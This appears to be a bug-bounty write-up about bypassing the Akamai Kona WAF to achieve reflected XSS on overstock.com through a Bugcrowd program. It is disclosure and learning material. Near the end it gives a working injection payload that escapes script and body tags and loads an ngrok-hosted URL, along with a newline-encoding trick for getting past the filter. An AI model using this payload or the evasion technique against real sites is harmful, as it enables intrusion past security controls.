How i bypassed AKAMAI KONA WAF , XSS in overstock.com !
This target is available on bugcrowd program and this target as my research about xss (Cross site scripting) and i research this for learning about how the WAF work.
Learn more about Overstock.com's vulnerability disclosure program powered by Bugcrowd, the leader in crowdsourced…bugcrowd.com
endpoint i found is using google dork ( use your brain ). and i came with this vulnerable URL
and this target is protected with
AKAMAI KONA WAF + XSS HEADER PROTECTION
first i check where the reflected of our script with view-source
we can see “crot” reflected to that ( i dont know about that array or fucking object ) now i try to use “</script></body>” to escape <script> and <body> in overstock.
yay… !!! our payload success to escape that.
every payload i search about bypass “AKAMAI WAF” :
- in twitter post
- in github post Ed
- in hackerone
Thanks to the 18F team for the great experience, fast fix, and the bounty!* This XSS was undetectable by the most XSS…hackerone.com
and all the tips i try , i still cant bypass the Akamai WAF using that. and now i try to research alone :( to inserted my xss host ( i use ngrok.io ) for LISTEN response to my host and as example i using “w3schools tryiteditor” to test BODY TAG HTML to insert my xss host
and i try to use payload
see my ngrok host is get a response from w3school page request
NOW TIME FOR BYPASS WAF AKAMAI KONA in OVERSTOCK
with my payload
“ </script></body><body%20background=%27https://dfc26b38.ngrok.io/overstock%27%0a> “
why i use “%0a” in end of tag is because the waf still blocked my payload with ending “>” and because that i add “\n” => (convert to urlencode)
response from my ngrok.io
XSS SUCCESS !
Follow my twitter